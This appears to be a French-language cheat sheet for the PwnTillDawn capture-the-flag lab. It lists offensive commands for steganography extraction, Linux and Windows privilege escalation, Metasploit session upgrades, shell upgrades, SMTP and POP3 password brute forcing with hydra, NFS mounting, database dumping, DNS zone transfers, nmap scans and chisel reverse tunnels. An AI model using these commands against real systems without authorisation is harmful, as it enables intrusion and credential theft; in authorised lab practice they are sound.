Pwntilldawn FULL
Stegano
Steghide
steghide extract -sf screen.jpeg
Aperisolve
Stereogram
Depixelise
Depix
python3 depix.py -p pixel_image -s images/searchimages/image.png
Unredactor
searchsploit
searchsploit -m xxxxx
WEB
Privesc
Lien symbolique
ln -s /root /home/michael/importantfiles/rootbackup
linpeas
sudo python3 -m http.server port ( attaquant ) et wget
Windows
msfconsole
multi/recon/localexploitsuggester
Shell
Upgrade shell
ps --> migrate pid
sessions -u id
Metasploit
Upgrade session : sessions -u <id>
msfconsole
multi/recon/localexploitsuggester
LXC/LXD
Python Library Hijacking
Script qui tourne en root avec des imports de librairies
searchsploit
searchsploit xxxx
searchsploit -m chemin
SUID
find / -perm -u=s -type f 2>/dev/null
Find files
Linux
Find
find / -type f -name 'FLAG[0-9].txt' 2>/dev/null
find / \( -name ".env" -o -name ".git" \) 2>/dev/null
find ./* | grep FLAG3
find / -type f -name 'FLAG[0-9][0-9]' 2>/dev/null
Other
grep -r pattern
Windows
@for /r C:\ %i in (FLAG??.txt) do @echo %i && @type "%i"
Misc
Si besoin des erreurs mais pas affichée ( ex webshell php )
Ajout de "2>fichier" apres la commande
puis faire un cat du fichier
Dumb shell upgrade
script /dev/null -qc /bin/bash
python3 -c 'import pty; pty.spawn("/bin/bash")'
python -c 'import pty; pty.spawn("/bin/bash")'
netstat -antup
netstat -antup
Protocoles divers
SMTP
smtp-user-enum -U /usr/share/wordlists/metasploit/unix_users.txt 10.150.150.17 25
hydra -l operator -P wordlist.txt ipip smtp
NFS
rpcinfo IP
sudo umount 10.150.150.59:/nfsroot
sudo mount -t nfs ip:/remote /local
showmount -e IP
FTP
Login anon à vérif
Mysql
mysqldump -u root -p --all-databases > alldb.sql
mysql -h localhost -u sql_user -p
POP3
hydra -l operator -P wordlist.txt ip pop3
SSH
Connexion si on a la clé privée
ssh -i id_rsa user@ip
Test de se co pour la bannière
DNS
Ajout dans /etc/hosts si besoin
Exemple :
10.150.150.57 rickscontrolpanel.mortysserver.com
! AXFR !
dig @mortysserver.com mortysserver.com axfr
NMAP
sudo nmap -sF -p1-100 -T4
nmap -sV -Pn -p- -T5 ip
nmap -sV -sC -T5 -p- ip
Pivoting / Tunneling
Verifier ce qui écoute sur localhost
netstat -antup
Tunneling & Port Forwarding
Web en écoute sur localhost
Sur l'host
chisel server -port 7777 --reverse
Subtopic
Sur la victime
./chisel client ip_host:7777 R:8080:127.0.0.1:8080
Si on a un acces SSH
sshuttle -r user@ip -N